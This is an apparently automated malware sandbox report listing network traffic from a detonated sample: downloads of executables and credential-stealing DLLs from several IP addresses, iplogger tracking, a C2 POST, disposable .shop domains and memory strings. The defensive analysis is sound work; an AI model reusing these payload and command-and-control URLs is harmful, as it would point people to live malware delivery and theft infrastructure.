Code function: 10_2_006BBD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

10_2_006BBD30

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /George.exe HTTP/1.1Host: moreapp4you.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1lLub HTTP/1.1Host: iplogger.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zgAu8AhbCZfWDEn&MD=ZxexwrtV HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iplogger.co/1lLubAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 54493797137263905=2; clhf03028ja=8.46.123.33
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 54493797137263905=2; clhf03028ja=8.46.123.33
Source: global traffic	HTTP traffic detected: GET /frielandrews892/File/releases/download/installer/Installer.exe HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T035854Z&X-Amz-Expires=300&X-Amz-Signature=8324c918359c5367cfdc1d9d5eef365178e8f36844b683c69ab0dfb51d1fff3b&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tmp/1.exe HTTP/1.1Host: biancolevrin.com
Source: global traffic	HTTP traffic detected: GET /4c7L8Zs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pixel.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zgAu8AhbCZfWDEn&MD=ZxexwrtV HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 77.91.77.81Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /lend/gold.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: GET /NewLatest.exe HTTP/1.1Host: 185.172.128.116
Source: global traffic	HTTP traffic detected: GET /wp-includes/ldr.exe HTTP/1.1Host: 94.228.166.74
Source: global traffic	HTTP traffic detected: GET /lend/alex5555555.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: GET /lend/123.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: GET /down/O3B6wY7ZkFhh.exe HTTP/1.1Host: 43.153.49.49:8888
Source: global traffic	HTTP traffic detected: GET /down/TpWWMUpe0LEV.exe HTTP/1.1Host: 43.153.49.49:8888Cookie: c50233950c3f39bd96d165eee1995d77=4d35933e-4098-4d9c-a342-9194989f64d0.B0uLxE_ywpoMuQTk0RbwSRoCfc4
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/sqlite3.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/freebl3.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/mozglue.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/msvcp140.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/nss3.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/softokn3.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/vcruntime140.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wp-includes/stl.exe HTTP/1.1Host: 94.228.166.74
Source: global traffic	HTTP traffic detected: GET /wp-includes/rig.exe HTTP/1.1Host: 94.228.166.74
Source: global traffic	HTTP traffic detected: GET /images/pic2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bingowin.bet

Source: Explorers.exe, 0000002A.00000002.1954319592.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: Explorers.exe, 0000002A.00000002.1954319592.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
Source: Explorers.exe, 0000002A.00000002.1954319592.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldbxF equals www.youtube.com (Youtube)
Source: Explorers.exe, 0000002A.00000002.1954319592.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: Explorers.exe, 0000002A.00000002.1954319592.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: moreapp4you.online
Source: global traffic	DNS traffic detected: DNS query: iplogger.co
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: facilitycoursedw.shop
Source: global traffic	DNS traffic detected: DNS query: publicitycharetew.shop
Source: global traffic	DNS traffic detected: DNS query: computerexcudesp.shop
Source: global traffic	DNS traffic detected: DNS query: leafcalfconflcitw.shop
Source: global traffic	DNS traffic detected: DNS query: injurypiggyoewirog.shop
Source: global traffic	DNS traffic detected: DNS query: bargainnygroandjwk.shop
Source: global traffic	DNS traffic detected: DNS query: disappointcredisotw.shop
Source: global traffic	DNS traffic detected: DNS query: doughtdrillyksow.shop
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: biancolevrin.com
Source: global traffic	DNS traffic detected: DNS query: bit.ly
Source: global traffic	DNS traffic detected: DNS query: pixel.com

Source: unknown

HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 03:59:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 03:59:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 03:59:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 03:59:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 03:59:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 03:59:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 7b 02 64 41 fb 2f 03 f5 b6 45 f6 8a ad a3 2f 95 29 d0 eb 6c 4a 1c 8f d8 c1 cb 7c d1 Data Ascii: #\{dA/E/)lJ\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 04:00:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 04:00:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 04:00:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 04:00:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 27 Jun 2024 04:00:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.1
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/MB
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000013.00000002.3791168067.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000013.00000002.3791168067.00000000014AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php973245
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php:
